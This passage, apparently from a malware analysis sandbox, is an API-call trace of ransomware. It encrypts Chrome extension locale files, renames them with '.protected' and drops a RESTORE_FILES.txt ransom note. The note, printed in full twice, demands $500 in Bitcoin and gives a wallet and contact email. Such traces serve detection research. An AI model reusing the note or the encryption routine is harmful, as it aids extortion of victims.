returned -1 [0079.839] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.839] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.839] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.839] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\.") returned 148 [0079.839] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.839] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.839] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.839] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.839] lstrcmpiW (lpString1="..", lpString2="Program 
Files (x86)") returned -1 [0079.839] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.839] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.839] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\..") returned 149 [0079.839] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.839] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.839] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.839] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.840] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.840] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.840] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.840] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.840] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0079.840] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.840] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.841] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, 
lpOverlapped=0x0) returned 1 [0079.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.841] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.842] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.842] CloseHandle (hObject=0x168) returned 1 [0079.842] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.protected") returned 170 [0079.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0079.842] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.843] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) 
returned 1 [0079.843] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 164 [0079.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.843] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.843] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.844] lstrlenA (lpString="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") returned 684 [0079.844] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.844] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.844] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.844] CloseHandle (hObject=0x164) returned 1 [0079.844] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0079.844] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT") returned 146 [0079.845] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0079.845] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0079.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*") returned 148 [0079.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.845] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.845] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.845] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.845] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.845] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.845] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\.") returned 148 [0079.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.845] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.845] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.845] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.845] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.845] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\..") returned 149 [0079.845] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.845] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.846] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.846] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.846] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.846] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] 
StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.846] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.847] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.847] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.848] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.848] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.848] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.848] CloseHandle (hObject=0x168) returned 1 [0079.848] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.protected") returned 170 [0079.848] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0079.849] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.849] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.849] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 164 [0079.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.849] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.849] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.850] lstrlenA (lpString="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") returned 684 [0079.850] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.850] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.850] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.850] CloseHandle (hObject=0x164) returned 1 [0079.850] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.850] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0079.850] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0079.851] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0079.851] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0079.851] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0079.851] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro") returned 143 [0079.851] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0079.851] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0079.851] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*") returned 145 [0079.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.852] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.852] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.852] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.852] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.852] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\.") returned 145 [0079.852] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.852] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.852] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.852] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.852] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.852] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.852] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\..") returned 146 [0079.852] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.852] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.852] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
